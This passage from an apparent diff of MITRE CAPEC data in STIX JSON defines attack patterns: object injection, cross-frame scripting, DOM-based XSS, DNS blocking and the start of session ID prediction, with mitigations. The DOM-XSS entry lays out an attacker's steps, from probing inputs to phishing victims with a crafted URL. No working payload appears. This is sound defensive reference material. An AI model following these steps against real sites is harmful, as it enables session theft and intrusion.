This can result in a number of unwanted outcomes, including remote code execution.", + "external_references": [ + { + "external_id": "CAPEC-586", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/586.html" + }, + { + "external_id": "CWE-502", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/502.html" + }, + { + "description": "Deserialization of Untrusted Data, 2017--01, OWASP", + "external_id": "REF-468", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Object Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Functions that assume information in the deserialized object is valid could be exploited.)" + ], + "Availability": [ + "Resource Consumption (If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources.)" + ], + "Integrity": [ + "Modify Data (Attackers can modify objects or data that was assumed to be safe from modification.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must unserialize data before validation." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Validate object before deserialization process\n ", + "id": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50611ddc-8881-4263-bab2-125e6dffc2dd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Design: Limit which types can be deserialized.\n ", + "id": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c5e70b1-a550-4e28-b4d8-d9530d4fab32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be57abfe-85d5-4551-999f-0b9a7599d222", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Keep session state on the server, when possible.\n ", + "id": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e21732f4-8d62-489d-a0d9-028bc964377b", + "modified": 
"2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid clicking on untrusted links.", + "id": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3562cf5-2484-4ed5-97e3-8da8f0bf5ea7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame.", + "id": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de5b8ee3-b664-4dc0-8e2e-e49c5c3df549", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. 
An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.", + "external_references": [ + { + "external_id": "CAPEC-588", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/588.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Reflected DOM Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Reflected_DOM_Injection" + }, + { + "description": "Amit Klein, DOM Based Cross Site Scripting or XSS of the Third Kind", + "external_id": "REF-471", + "source_name": "reference_from_CAPEC", + "url": "http://www.webappsec.org/projects/articles/071105.shtml" + }, + { + "description": "Jakob Kallin, Irene Lobo Valbuena, A comprehensive tutorial on cross-site scripting", + "external_id": "REF-472", + "source_name": "reference_from_CAPEC", + "url": "https://excess-xss.com/" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-618", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DOM-Based XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + 
"Access_Control": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful DOM-based XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. 
In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the '#' character) can be used.\n http://my.site.com/aform.html#mode=\n In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for DOM-based XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Specific to DOM-based XSS, the adversary is looking for areas where input is being used to directly change the DOM.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim. In DOM-based XSS, the malicious script might not even be sent to the server, since the victim's browser will manipulate the DOM itself. This can help avoid serve-side detection mechanisms.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Add a URL fragment to alter the value of the expected Document object URL.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that manipulates the DOM via client-side scripting.", + "An application that failS to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use browser technologies that do not allow client-side scripting.", + "id": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--279f0698-c251-4497-8cf6-8dd35638757e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.", + "id": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6f81714-a1aa-46d0-ad1e-fdbfa6e5814e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before use.", + "id": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19dedc30-dbcc-4fd6-bad2-bade72cef5d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. 
In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.", + "external_references": [ + { + "external_id": "CAPEC-589", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/589.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014, Sigcomm", + "external_id": "REF-473", + "source_name": "reference_from_CAPEC", + "url": "http://conferences2.sigcomm.org/imc/2014/papers/p285.pdf" + } + ], + "id": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DNS Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Preventing DNS from resolving a request denies the availability of a target site or service for the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Full URL Based Filtering: Filtering based upon the requested URL.\n URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.\n " + ], + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hard Coded Alternate DNS server in applications", + "id": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--428bf1f5-901f-40d8-aeb9-ab5da829f74e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid dependence on DNS", + "id": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2679eb47-74ab-4dab-8fa0-80041226d78e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "target_ref": 
"attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Include \"hosts file\"/IP address in the application.", + "id": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f64c49e-d265-4f33-afbc-5434b791104b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure best practices with respect to communications channel protections.", + "id": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fe24de-1db9-45eb-8e29-7ca9bc4049d1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a .onion domain with Tor support", + "id": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43839acc-f71a-4622-9a26-8bf9926bbfc4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets predictable session ID in order to gain privileges. 
The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.", + "external_references": [ + { + "external_id": "CAPEC-59", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, 